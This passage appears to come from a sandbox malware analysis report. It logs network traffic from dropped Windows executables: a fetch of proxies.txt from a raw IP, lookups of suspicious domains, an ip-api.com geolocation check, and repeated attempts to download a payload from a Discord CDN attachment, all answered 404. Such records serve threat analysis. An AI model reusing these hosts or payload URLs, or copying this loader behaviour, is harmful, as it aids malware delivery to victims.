      • C:\Windows\system32\conhost.exe
        \??\C:\Windows\system32\conhost.exe "410733652-792252731-15552243301337362575265087720-19596527081131691164-1956904596"
        1⤵
        PID:1048

                Network

                • flag-fr
                  GET
                  http://212.193.30.45/proxies.txt
                  Mon166dc6040fb8726.exe
                  Remote address:
                  212.193.30.45:80
                  Request
                  GET /proxies.txt HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: 
                  Host: 212.193.30.45
                  Response
                  HTTP/1.1 301 Moved Permanently
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 06 Nov 2024 10:41:10 GMT
                  Content-Type: text/html
                  Content-Length: 178
                  Connection: keep-alive
                  Location: https://212.193.30.45/proxies.txt
                • flag-us
                  DNS
                  www.listincode.com
                  Mon1631358b82299bd8.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.listincode.com
                  IN A
                  Response
                  www.listincode.com
                  IN CNAME
                  expired.namebright.com
                  expired.namebright.com
                  IN CNAME
                  cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                  cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                  IN A
                  52.203.72.196
                  cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                  IN A
                  54.84.177.46
                • flag-us
                  DNS
                  56.jpgamehome.com
                  Mon16e127a54386dd68.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  56.jpgamehome.com
                  IN A
                  Response
                • flag-us
                  DNS
                  tweakballs.com
                  Mon16737798ac26f984.tmp
                  Remote address:
                  8.8.8.8:53
                  Request
                  tweakballs.com
                  IN A
                  Response
                • flag-us
                  DNS
                  ip-api.com
                  Mon1618e4439d986270.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  ip-api.com
                  IN A
                  Response
                  ip-api.com
                  IN A
                  208.95.112.1
                • flag-us
                  GET
                  http://ip-api.com/json/
                  Mon1618e4439d986270.exe
                  Remote address:
                  208.95.112.1:80
                  Request
                  GET /json/ HTTP/1.1
                  Connection: Keep-Alive
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                  viewport-width: 1920
                  Host: ip-api.com
                  Response
                  HTTP/1.1 200 OK
                  Date: Wed, 06 Nov 2024 10:41:12 GMT
                  Content-Type: application/json; charset=utf-8
                  Content-Length: 289
                  Access-Control-Allow-Origin: *
                  X-Ttl: 38
                  X-Rl: 43
                • flag-us
                  DNS
                  cdn.discordapp.com
                  Mon164c5af508c3.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  cdn.discordapp.com
                  IN A
                  Response
                  cdn.discordapp.com
                  IN A
                  162.159.133.233
                  cdn.discordapp.com
                  IN A
                  162.159.129.233
                  cdn.discordapp.com
                  IN A
                  162.159.130.233
                  cdn.discordapp.com
                  IN A
                  162.159.135.233
                  cdn.discordapp.com
                  IN A
                  162.159.134.233
                • flag-us
                  DNS
                  webdatingcompany.me
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  webdatingcompany.me
                  IN A
                  Response
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:16 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=.X9AGwIh2JtqocTdFqmjQvuNM7hDrWDrEBIwWlU0q5I-1730889676-1.0.1.1-E3sREpKtYKYjhdcMvl_XDIanxujZ2FiP9PiR_qQnlguMiaqJMXjCo8Q8L3dJCul2Hwv8KqEBZ_K42zPRrKJd8g; path=/; expires=Wed, 06-Nov-24 11:11:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBpjWWDBsoPRARqphngwqCAcPNR%2BlWd58swonQnL6boDNGNSOi1nImYtutHeUOTl3eyxNqIzyEErTzk6e45Njp3PEhSYogG8JZ%2FL0ELaP6u9rXruQWe%2F0T1Fh3rMG7s5kF2A%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=BJkJqPSJ9u24hFjSlPJWyNCNmuyLlrU7qvOLwHvZYRQ-1730889676090-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de4785b1b5593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:22 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=bdhYEghqP9KZyLdQzX_OOyvr6AEUYCy4YxNz7q9kOw0-1730889682-1.0.1.1-WbBFtEaNIgzOCB9wU5WqW0CVGu3TIDM7t8IlZawpS_cabx0DZAx0S3tIaRNUmHF3cm2hKMNjvYMRZUD523mByQ; path=/; expires=Wed, 06-Nov-24 11:11:22 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2v5NZXGq6E1u27ii9PwVlnqZ%2FuxihsbkThml%2BD2vZT1AqK2XLJrX3Szji%2F2XJfFaMbcGBUuL85TEVPoHvHKbSMufog7%2FTLmdAzaKEDdoXBAaAcT9s2PG%2B8M0htUQGzqW2i1yIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=mcrxekeu2hmao_p5Bfew8Reo3nkfZUpHLDNalPrkmxU-1730889682183-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478816a5b93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:27 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=KiPBZPREwj4yLzFO4UUJhX5vVmawtzvZ53dA2mNQXUo-1730889687-1.0.1.1-.UAdUeFj2NNipGS521JMor_6LsVwtOk.ngJK1kEQL4hIUMpcXnOda7i_VsMzNvLQIda0y6eQhhmaAgfDTNWxOA; path=/; expires=Wed, 06-Nov-24 11:11:27 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SW5X0siLrMegQi0TeQMnxhEHOED8QozCfkgpzy1okp6nm6Cv3rw4QkQ%2Boi6MEKLXohwisYXTyuJr1Qj66H9DFr%2Ba84inKoeeJBewdTbAORdW5nGgANrznLmf%2F%2Fbg2Z7EL3s6Dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=ALFirbTkYn_d47UtyaH.8IBA1YiBVWLPHZStga5lvvA-1730889687283-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478a13ca793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:32 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=D8wg3KRwbEcN89yLg.hIX0oYw5GuBRZ0.OxTajfD8bA-1730889692-1.0.1.1-ao4.3yIVwMfraKldZFkbmTQs3MMsMXvQs2tMyg26wLDitd1z3ExAsvfUBVIkWntA3qKvsOEmr.KJlu8O39Nj.g; path=/; expires=Wed, 06-Nov-24 11:11:32 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iVPtbYzTgBWC0aczjZy%2FiUoWdJ6czJNiAuqqM23asjzTNsIMpcacrhNAB6GhifzhYRL2lacRk5yqgnRcWDIyNoeHnHj5iqY%2FXIRaJOcoU8W7FiYsANTf%2Bqg%2BIfzFqbQQXY7zOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Vwry54tDzL72LbVyDWF5h1nmqeVOonm1qVreYjLOfhs-1730889692374-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478c128ce93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:37 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=6gXadrdfAkn0GqjwmPidhG0Gnk68UfbXNzdGx10O1lQ-1730889697-1.0.1.1-24qV.rIyQiucygWE4rdA0UTlHSaiDYoOcwrvxaVNFZ4tSuhJoWcbZ0nh16CfDXMU0WIELffU4MlaNkka9Pxxfg; path=/; expires=Wed, 06-Nov-24 11:11:37 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxqvwGbTl7vowudrrLT1JQ%2BCN54MaSYHLwYRvMzHCgY0j2mz8VPz%2F9QVEDGO4FmpAgFGkrc4IoisKIVRQDwnf4tf%2FNyE1C%2FAePeondSw5757w0xinmPTUVQAIPmExMbxhH4EUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=yTThKIJNIk4G4M_ctK6u5H0ribKA5IAS3OMP_jJNmk0-1730889697518-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478e13d0993f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:42 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=Z7ntRdLi.D0PCMOewdZGKrzsejnt0.2UIwUt1mJEmMI-1730889702-1.0.1.1-P4LBACkca8VmoFw1S8XgzbWNGv1N9zBXokl2r9c9cg62uhlspD6ccazl3D9RwoDUWafmu0Rxh6uHrTIFImQJxA; path=/; expires=Wed, 06-Nov-24 11:11:42 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lb8BX4sKX65Ou%2BpN6%2F1R7h%2BXcwW7WqybmnJU4qKvOWq3Uf8YnHvH9deib7sdn1%2FJs5M2gAHAyciFJs57DQArq4c6v0thuftSQyr%2FpPceGgtAXPr5OJttEccIpNgsSRvHnsnpeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=GH3FUgKPt7axBiKeYMyW7pZjIehC6wxPdmtekuk1zAU-1730889702610-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479010b0993f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:47 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=NVUvltmMfoyRbxo9gz2FnFMYrIancUIVIlIjVgdYv5w-1730889707-1.0.1.1-AMgCtgg3rKalKsGYUq0FaFMsG4JcBOFyz0VFtbesISS6qxfxWZlXAHkGRfemcQk16gblaLA.Wh6uYe2cHwFwQg; path=/; expires=Wed, 06-Nov-24 11:11:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OIrUvBP6jH%2BPGOvRcmMRukY2jWUfDEYArSpCk8gXWmS8Huc1T13PGPMIRUiUK9y2FRq%2BGJnfDbNTTWRHy79RgAe9PfNVPTWjARYdyLaLCbM6t61hYkkJcMavdijJFQKsjoAR7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=6IQE7WJdsSk6NgXkCXKTYLJBw8su9uRd8mLkLkn_SvE-1730889707673-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47920d9e793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:52 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=HWojD4ZYmTtzNp3LeTyE8MEhJdvGt1vY.mnIDZGXmOM-1730889712-1.0.1.1-LiAvC5QKvQOlMnNiBfvSvhZ2E_zSCjtaegoSd1dXlDWFjyjGPat3PLq1cLTzu.NXJRiQ52CXHqO7FRGMEfF.NQ; path=/; expires=Wed, 06-Nov-24 11:11:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WNSmQUHRlJ7zfTX9enLkZPYlSUIje9nAFm9iwt82Y3XphrQSSK%2BOOiI4Aws7RtXv5wwPxU%2FXT1NubbHJj4UNFNVzDEg4hM9q%2B0zpEPDrh9LOVNGHf8eIIXFZwmGDQIFF7ux0zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=YG3iQcIfgg0BFsNn6V88A2Az4ElThp6UaXayx9pgLcM-1730889712738-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479408ea893f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:57 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=tijGjU0G1S6UoDK5BvGezxkG9EeanHK05WFWxg.42gs-1730889717-1.0.1.1-RBjO7Ktebg2GwdYRCuFlNw09dn81z6XG04xARLaUmW7ZWAj7KVFKnXu9RXtff0NuspZCyJB3TFsuiqFNN3RHew; path=/; expires=Wed, 06-Nov-24 11:11:57 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wxGsX%2BQYYLaj0jdesuyPFur7SWh%2BlC4jGoJMx94%2BOvwo2Ndmaue0jgsZhRM%2FGuP2sdIkaccLRELeHOBZfHXrqGf9K1AX63%2BFvj%2BS9Cui79qsJya5yrkwVCDzlcy3XNFL7PvU2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=JcMDXNzl1S9Ydf4IaxrsN4vNtS.2OgLcop.QJGrfkrk-1730889717817-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479602c2793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:02 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=voIzlx4dg425ik0vDyJCy.v.KubPHdiwyy1DWGxclvo-1730889722-1.0.1.1-OU9ZUvLNnEVgTdNNfGTlSeZ7sG4GHwU7gJf6rZqePXRaoIZ33s3w2taaAWVKpmSopDeOJ2.HMKU8QuYGk7Nrig; path=/; expires=Wed, 06-Nov-24 11:12:02 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=188D18HJavTMIkr3FPaBN9RlhTnvkPlwlQeLNKqP0S8QmNrrfSWXS1zvoeyWT1bZNloi22pl2y0u6Fv%2Fd9W9nEvNJ2VCRAPtyZykjS4py9i%2BaQpZlWf6k%2BWmhpVde66wDIxmNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=tqmJ77mvlBH4oeLBiJoCMmmQzysgpLXAz5B_taOC5.I-1730889722912-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de4797fd83b93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:08 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=yH8IXZEHN0phdS_hXzPQsMxcToP1CVa9ujPGomhx860-1730889728-1.0.1.1-czAuCSrJ82g21XvmUKW0Vj9tRfqrQtEY3hOAQcrvxHHWSIFuBM43QcyXwdK93wGP5642iu1I2ltvA6BZdpLjbw; path=/; expires=Wed, 06-Nov-24 11:12:08 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYa24C7lay8xW6KXfP7y0eoIaXYBqWgAkfrDpFlBd01Aep8Nxw6Iurl8XDwgdSP87243kLujGlBVDp79naR3vsFQc2zSLCjQJ%2Biv0F%2FeqHwYRacqpi8GCXbhAFwrttUp2YDQAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=UpztrWaDeyXwulZgf3WgVoYx4i7pza4F01lByNL9e88-1730889728037-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de4799fbe4593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:13 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=HHpEjk60PYv4qERvRCzlHi.EOl4Le5l1pyZ7CFYpL9k-1730889733-1.0.1.1-DAd4VBjq7cf61AOD1rkA.FPm.ds0C9oLr3vDdXwD46C4Ikxe8u6WSwVWcIYWOZm5IFpf3ZCBpDpL5nd_DFd5Qg; path=/; expires=Wed, 06-Nov-24 11:12:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihL%2BoCwZRhX1pmqq1HwUOySpX8we046HWXP4hhiG7YnMZQE6NCrNM46TTnkFcsppexO89W2AG57RV7AXZ0wveMwG7B5QZAgTyXLJNwV8huRRluYKGuzipycovX5YP7GEUSHJmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=xPYqmVn3IikzXb2jznKPOgn00mFx1CgW54RpfzJvVAI-1730889733130-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479bfdc3593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:18 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=yThev44QhTFN7VmTU_QwK8Z0s3FyZTiQ_ujwUU2.j1Y-1730889738-1.0.1.1-0UQbqk6D3fkM32ADL9GJJk_VHRqfhjv9Bt2srYtiKnPD8.U0DGTvJc8JZMYMiAD8p1XBncKL_Z1eDFM0UxgaKQ; path=/; expires=Wed, 06-Nov-24 11:12:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSb3MQ80EWXh8WfgZkZDIbyMWtwSk4xYyAoOEM5BFexpLYJX%2B%2FtI6sgrXV9jtldG%2BDuUkY2H4uhslqUn%2BY14gUpkXRggsn9HCqP2LCB9oQibFyGmN3AOXfJGyaAhHhTachQrEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=HYPALc1ZOmWZKX61ORVQ8wrFqS7QKFVAdFQIFwQn5Dw-1730889738218-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479dfacff93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:23 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=3yourbBp__MNcOOqcGCS9LXeXy9JmKohP6ejnyVCafw-1730889743-1.0.1.1-43E869nUcgc3hKYQw56XKDuLO5QgaM39Ox8lNt8IBcA9_nfLgw9NGH6ORoEwankbKGuKHzXWlzrT8usIHZeMAg; path=/; expires=Wed, 06-Nov-24 11:12:23 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tAmjwSoPCr2K0R6vmphYmujNS%2B9F%2BsLbXIszbpPRNB4qUENuAUSBMKLcqUM7idrYjE3QEGRqYaGj16Re3PF9zMCGcYSEFhoXXcGV4ZVYJ89XVjTOCLyHb8%2FqQZzhTf5UiVxCNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=P3ni90yciPfCJYLw35sbgj4bnJeN8MmwwKm369NtfU4-1730889743299-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479ff581c93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:28 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=5Tu3uSzFe_u0ql0piOyslmrRnqNvTgImx7mYbrHzERM-1730889748-1.0.1.1-mDDRXC_IxpTHAGZzXa68GESHc722eS8QWd9pk.rjLyPslvSzbU.UQHwGiabTH05m49IucHekGthYQO0.uwetcQ; path=/; expires=Wed, 06-Nov-24 11:12:28 GMT; domain=.discordapp.com; HttpOnly; Secure
